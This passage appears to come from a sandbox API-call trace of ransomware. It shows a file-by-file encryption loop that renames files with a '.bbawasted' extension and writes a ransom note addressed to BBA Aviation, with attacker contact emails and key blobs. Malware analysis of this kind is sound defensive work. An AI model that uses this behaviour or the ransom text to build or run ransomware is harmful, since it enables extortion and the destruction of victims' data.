lpOverlapped=0x0 | out: lpBuffer=0x6a5e60*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0159.624] SetEndOfFile (hFile=0x288) returned 1 [0159.624] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0159.624] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a5e60 | out: hHeap=0x660000) returned 1 [0159.624] lstrcpyW (in: lpString1=0x69e366, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0159.624] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1030\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1030\\eula.rtf"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1030\\eula.rtf.bbawasted" (normalized: "c:\\588bce7c90097ed212\\1030\\eula.rtf.bbawasted")) returned 1 [0159.625] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1030\\eula.rtf.bbawasted" (normalized: "c:\\588bce7c90097ed212\\1030\\eula.rtf.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0159.625] CreateFileMappingW (hFile=0x28c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x280 [0159.625] GetFileSize (in: hFile=0x28c, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0xcf2 [0159.625] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xcf2) returned 0x630000 [0159.625] CloseHandle (hObject=0x28c) returned 1 [0159.635] UnmapViewOfFile (lpBaseAddress=0x630000) returned 1 [0159.636] CloseHandle (hObject=0x280) returned 1 [0159.636] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x6ae598 [0159.636] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6aef68) returned 1 [0159.637] CryptGenRandom (in: hProv=0x6aef68, dwLen=0x1b8, pbBuffer=0x6ae5e0 | out: pbBuffer=0x6ae5e0) returned 1 [0159.637] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0159.637] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6aef68) returned 1 [0159.637] CryptGenRandom (in: hProv=0x6aef68, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0159.637] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0159.692] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0159.693] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ae598 | out: hHeap=0x660000) returned 1 [0159.693] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a5e60 [0159.693] _snwprintf (in: _Dest=0x6a5e60, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]et7MEXw4nF0FwB8gRnJvncdqz67wQf7CcBS5qFl0v8JauV4AOux1UJd1PXdVa9nG\r\nnxVQ41kynGpfqP0p33PYRdmNmeWZXgGjarLpdMNbIpxkbIwWW/1NINQCtnzdqF56\r\nuLi/KDGQFHI8NQPUT86qvAwhWYujc0o4K/4MSlk1hXDRvaUHYvVE3eenaG7QgTVG\r\nwmlIMCyPVlDaiNNjqIzUE52kYMA64z1j3jTEOpT5DrC9j5DLbdfbZDbhVdWwZ8no\r\n+iKl+ZezO45AH8plYgewdqRXSJMhKjKoInvUUstubd7utN3TFi+6yTb69wgnm/to\r\n61VqD4TOevrqa/3wUqQLB5M7cj57r/mAmFFv+TZ9o5bRK1oVp9h2sYoYGAmMrBGX\r\nhSZmGdaWm0+8roGcVa3epio7Mc3blax2+W1BOSxFoMea90xVhlGW3hHtNSyJ7RjV\r\ndnVp3CZ35Uu0wxlPJvee57sgRDEwVZ+CST7DA01p4DN9Iw4LMwp8YjwLNnvRdEL5\r\nR3Hvr84do5M9TWwnuMqVNUDTQGwlrgbFBQMCeQdbuFm7HLYepJXMCe1Gf8Ti1GcV\r\nXAjQ5pKrR6C8zPQ3bLzY0/cX5+py+6fKbFZ2A07ZGBKAePSyTLRtuif47epFAGgN\r\nxeyppotmo8eQYwy4T+RdLOik7emAe0xNwepRVoRyBHJ=[end_key]\r\nKEEP IT\r\n") returned 984 [0159.693] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0159.693] WriteFile (in: hFile=0x288, lpBuffer=0x6a5e60*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6a5e60*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0159.693] SetEndOfFile (hFile=0x288) returned 1 [0159.734] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a5e60 | out: hHeap=0x660000) returned 1 [0159.734] CloseHandle (hObject=0x288) returned 1 [0159.771] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x69e318 | out: hHeap=0x660000) returned 1 [0159.771] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689eb0 | out: hHeap=0x660000) returned 1 [0159.771] _aulldvrm () returned 0x0 [0159.771] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6aef50) returned 1 [0159.772] CryptGenRandom (in: hProv=0x6aef50, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0159.772] CryptReleaseContext (hProv=0x6aef50, dwFlags=0x0) returned 1 [0159.772] lstrlenW (lpString="\\\\?\\C:\\588bce7c90097ed212\\1031\\LocalizedData.xml") returned 48 [0159.772] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x26a) returned 0x69e318 [0159.772] lstrcpyW (in: lpString1=0x69e378, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0159.772] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b5190 [0159.772] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6aef50) returned 1 [0159.773] CryptGenRandom (in: hProv=0x6aef50, dwLen=0xa3a, pbBuffer=0x6b5190 | out: pbBuffer=0x6b5190) returned 1 [0159.773] CryptReleaseContext (hProv=0x6aef50, dwFlags=0x0) returned 1 [0159.773] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1031\\LocalizedData.xml.bbawasted_info" (normalized: "c:\\588bce7c90097ed212\\1031\\localizeddata.xml.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x288 [0159.778] WriteFile (in: hFile=0x288, lpBuffer=0x6b5190*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6b5190*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0159.779] SetEndOfFile (hFile=0x288) returned 1 [0159.779] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0159.779] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b5190 | out: hHeap=0x660000) returned 1 [0159.779] lstrcpyW (in: lpString1=0x69e378, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0159.780] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1031\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1031\\localizeddata.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1031\\LocalizedData.xml.bbawasted" (normalized: "c:\\588bce7c90097ed212\\1031\\localizeddata.xml.bbawasted")) returned 1 [0159.780] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1031\\LocalizedData.xml.bbawasted" (normalized: "c:\\588bce7c90097ed212\\1031\\localizeddata.xml.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0159.781] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x280 [0159.781] GetFileSize (in: hFile=0x27c, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x141aa [0159.781] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x141aa) returned 0x630000 [0159.781] CloseHandle (hObject=0x27c) returned 1 [0159.841] UnmapViewOfFile (lpBaseAddress=0x630000) returned 1 [0159.841] CloseHandle (hObject=0x280) returned 1 [0159.841] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0159.841] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6aef50) returned 1 [0159.842] CryptGenRandom (in: hProv=0x6aef50, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0159.842] CryptReleaseContext (hProv=0x6aef50, dwFlags=0x0) returned 1 [0159.842] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6aef50) returned 1 [0159.843] CryptGenRandom (in: hProv=0x6aef50, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0159.843] CryptReleaseContext (hProv=0x6aef50, dwFlags=0x0) returned 1 [0159.854] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0159.854] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0159.854] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b5190 [0159.854] _snwprintf (in: _Dest=0x6b5190, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]sJQ4JwPtiZlLMFwwdBnP4iopIeISKngrP603nBG8UsvRkDRs+eH2Ae569MUyJ6rc\r\nKbegHtRTYFtHKcbFZIhEELzdS4OepiHf+UJwMwmIAoFxH9RmyVxh5+Op5xpTA540\r\nC9w2vfNN7TLHu+KrzZcdYdbBm7tzGmJw+e8V9a9vCqOJbsUBa3aqJ1e8HtvPA7vI\r\n6kL+ukb69WZcaUOpNhumk+rvjJmsd2AFqcRlHbmdJH/+qBcv4itb0+CGs7KtfBfz\r\nArxNhPdgqShuxLuPsxoj97SG9gUH9PmspMOwFyB6sktP3wxqO34Tfw/S/CzwUvfb\r\nW7z+/AOIrUh/na63OOSTdP6CMsLiTcC+x1yHZWLcsSEqqleYOsh8d1n5EoQw1YM9\r\nazlgKD6mywlATaMfvEn9eXMBLwzQhg7K8d77PLZQLdpH/Vb72BZo+CJhv4nqi8IR\r\njmO5M53IIeXn9oI8xG525LFdshZC8xiA0MXTzHzAijpl3B2HfO2Qh7G7S0uCRn4A\r\n81/eF30gIX81ZXopViC0drPCJoqvDJmHkL1UzKF8ccK7a/LqS4MxGUZXWaXD4bEl\r\ncjl+DyeBBxSWXmuMQPwowx9JoQxwxsbP55LupkvJN0pr3DYuRWeouUeqtNS8U5wk\r\n8h12Y7ugbn24ft2y1RJJaDPFVMP8k22JA0jWuY2axGa=[end_key]\r\nKEEP IT\r\n") returned 984 [0159.854] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0159.854] WriteFile (in: hFile=0x288, lpBuffer=0x6b5190*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6b5190*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0159.854] SetEndOfFile (hFile=0x288) returned 1 [0159.857] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b5190 | out: hHeap=0x660000) returned 1 [0159.857] CloseHandle (hObject=0x288) returned 1 [0159.860] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x69e318 | out: hHeap=0x660000) returned 1 [0159.860] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a0660 | out: hHeap=0x660000) returned 1 [0159.860] _aulldvrm () returned 0x0 [0159.860] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6aef50) returned 1 [0159.861] CryptGenRandom (in: hProv=0x6aef50, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0159.861] CryptReleaseContext (hProv=0x6aef50, dwFlags=0x0) returned 1 [0159.861] lstrlenW (lpString="\\\\?\\C:\\588bce7c90097ed212\\1032\\LocalizedData.xml") returned 48 [0159.861] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x26a) returned 0x69e318 [0159.861] lstrcpyW (in: lpString1=0x69e378, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0159.861] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b5190 [0159.861] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6aef50) returned 1 [0159.862] CryptGenRandom (in: hProv=0x6aef50, dwLen=0xa3a, pbBuffer=0x6b5190 | out: pbBuffer=0x6b5190) returned 1 [0159.862] CryptReleaseContext (hProv=0x6aef50, dwFlags=0x0) returned 1 [0159.862] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1032\\LocalizedData.xml.bbawasted_info" (normalized: "c:\\588bce7c90097ed212\\1032\\localizeddata.xml.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x288 [0159.873] WriteFile (in: hFile=0x288, lpBuffer=0x6b5190*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6b5190*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0159.874] SetEndOfFile (hFile=0x288) returned 1 [0159.874] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0159.874] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b5190 | out: hHeap=0x660000) returned 1 [0159.874] lstrcpyW (in: lpString1=0x69e378, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0159.874] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1032\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1032\\localizeddata.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1032\\LocalizedData.xml.bbawasted" (normalized: "c:\\588bce7c90097ed212\\1032\\localizeddata.xml.bbawasted")) returned 1 [0159.875] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1032\\LocalizedData.xml.bbawasted" (normalized: "c:\\588bce7c90097ed212\\1032\\localizeddata.xml.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0159.876] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x27c [0159.876] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x1510c [0159.876] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1510c) returned 0x630000 [0159.876] CloseHandle (hObject=0x280) returned 1 [0159.947] UnmapViewOfFile (lpBaseAddress=0x630000) returned 1 [0159.948] CloseHandle (hObject=0x27c) returned 1 [0159.948] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0159.948] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a0928) returned 1 [0159.949] CryptGenRandom (in: hProv=0x6a0928, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0159.949] CryptReleaseContext (hProv=0x6a0928, dwFlags=0x0) returned 1 [0159.949] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a0928) returned 1 [0159.949] CryptGenRandom (in: hProv=0x6a0928, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0159.950] CryptReleaseContext (hProv=0x6a0928, dwFlags=0x0) returned 1 [0159.964] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0159.965] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0159.965] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b5190 [0159.965] _snwprintf (in: _Dest=0x6b5190, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]aQb8esyr1DBhll+YflrfnV7MAZvGDImSerA9EzIJuSSLhPVCaAm3Utsgi1yJxgRu\r\n0DW3KSuN/kFA9nq0w77kCDV3yGnh7eYlOLivpza/rstny81wj8ea9pPep+qNmMks\r\nVMLtuRUggFE1DBV/bWz4lMA+GpyON8LyUaLZPQezmqb6TaDhDVZS/ErhDOd2DWar\r\nhXtycvnnTe4Cm1yytrLoYAkvwNpkUpkza6KG4IMfRSV4g8hGVVleiwrEVjhqdzwl\r\nnAcZPr9RZzKR3oLhgJCmy/0FV4q92IjwEAgzacGfMnmbXKpC2LQ8s4kzpSFDM8VK\r\nJ7/cc6uH0g4fSMNyTBUEROErDMfTyjkgybzD9ZZp7GmSSyAVrMD9jIXxdaDGvLUF\r\nrsWl+btuzOfHJDo2kzxb6JUW28BS9vJB1qLOb2+drgRlOYrp0WOu6t2/95F+q51g\r\nZRvPufgdB5RF73ojaQd2EJzKvffOPcA5FxiIDVejp29JUFu5OHE5TxrS2PMrqnBu\r\nS/ny+rWySEs/+Egmtut17xmd2ofRDfHKQ/2+d57/DGhRfYdeF0BetScCz61GI912\r\nG6k74Hro7LQcnWd2kETpzVP5c6CIdB+LAuiNZH3zfU7KdkRQSFp66D9NzFmaflOX\r\n2X8eCtsKI+6OFbqB1DRExO0/RGqMcELHlg8ZV7/Ycqb=[end_key]\r\nKEEP IT\r\n") returned 984 [0159.965] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0159.965] WriteFile (in: hFile=0x288, lpBuffer=0x6b5190*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6b5190*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0159.965] SetEndOfFile (hFile=0x288) returned 1 [0159.968] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b5190 | out: hHeap=0x660000) returned 1 [0159.968] CloseHandle (hObject=0x288) returned 1 [0159.970] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x69e318 | out: hHeap=0x660000) returned 1 [0159.970] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a09d0 | out: hHeap=0x660000) returned 1 [0159.970] _aulldvrm () returned 0x0 [0159.970] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6aef50) returned 1 [0159.971] CryptGenRandom (in: hProv=0x6aef50, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0159.971] CryptReleaseContext (hProv=0x6aef50, dwFlags=0x0) returned 1 [0159.971] lstrlenW (lpString="\\\\?\\C:\\588bce7c90097ed212\\1033\\LocalizedData.xml") returned 48 [0159.971] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x26a) returned 0x69e318 [0159.971] lstrcpyW (in: lpString1=0x69e378, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0159.971] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b5190 [0159.971] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6aef50) returned 1 [0159.971] CryptGenRandom (in: hProv=0x6aef50, dwLen=0xa3a, pbBuffer=0x6b5190 | out: pbBuffer=0x6b5190) returned 1 [0159.971] CryptReleaseContext (hProv=0x6aef50, dwFlags=0x0) returned 1 [0159.972] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1033\\LocalizedData.xml.bbawasted_info" (normalized: "c:\\588bce7c90097ed212\\1033\\localizeddata.xml.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0160.004] WriteFile (in: hFile=0x28c, lpBuffer=0x6b5190*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6b5190*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0160.005] SetEndOfFile (hFile=0x28c) returned 1 [0160.005] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.005] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b5190 | out: hHeap=0x660000) returned 1 [0160.005] lstrcpyW (in: lpString1=0x69e378, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0160.005] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1033\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1033\\localizeddata.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1033\\LocalizedData.xml.bbawasted" (normalized: "c:\\588bce7c90097ed212\\1033\\localizeddata.xml.bbawasted")) returned 1 [0160.008] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1033\\LocalizedData.xml.bbawasted" (normalized: "c:\\588bce7c90097ed212\\1033\\localizeddata.xml.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0160.008] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x294 [0160.008] GetFileSize (in: hFile=0x27c, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x12db0 [0160.008] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x12db0) returned 0x630000 [0160.009] CloseHandle (hObject=0x27c) returned 1 [0160.021] UnmapViewOfFile (lpBaseAddress=0x630000) returned 1 [0160.022] CloseHandle (hObject=0x294) returned 1 [0160.022] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0160.022] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6aef50) returned 1 [0160.023] CryptGenRandom (in: hProv=0x6aef50, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0160.023] CryptReleaseContext (hProv=0x6aef50, dwFlags=0x0) returned 1 [0160.023] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6aef50) returned 1 [0160.024] CryptGenRandom (in: hProv=0x6aef50, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0160.024] CryptReleaseContext (hProv=0x6aef50, dwFlags=0x0) returned 1 [0160.034] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0160.034] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0160.034] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a5e60 [0160.034] _snwprintf (in: _Dest=0x6a5e60, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 